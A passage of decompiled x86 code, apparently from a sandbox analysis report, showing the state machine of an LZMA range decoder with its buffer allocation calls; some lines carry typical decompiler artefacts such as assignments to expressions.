						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
